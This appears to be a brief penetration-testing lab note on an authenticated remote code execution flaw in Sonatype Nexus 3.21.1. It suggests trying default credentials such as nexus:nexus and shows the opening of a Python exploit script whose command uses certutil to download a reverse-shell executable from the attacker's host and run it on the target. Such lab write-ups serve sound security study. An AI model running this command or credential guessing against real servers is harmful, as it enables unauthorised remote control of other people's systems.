Sonatype Nexus 3.21.1
This application is vulnerable to Remote Code Execution with valid credentials.
This is the catch in this case. We've got to try different default credentials, even nexus:nexus or if we are able to maybe see it in an SMB share or FTP server.
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'
The exploit requires you to send an cmd command which I just change it to make the computer get one of my files. Afterwards we would get a reverse shell.
Last updated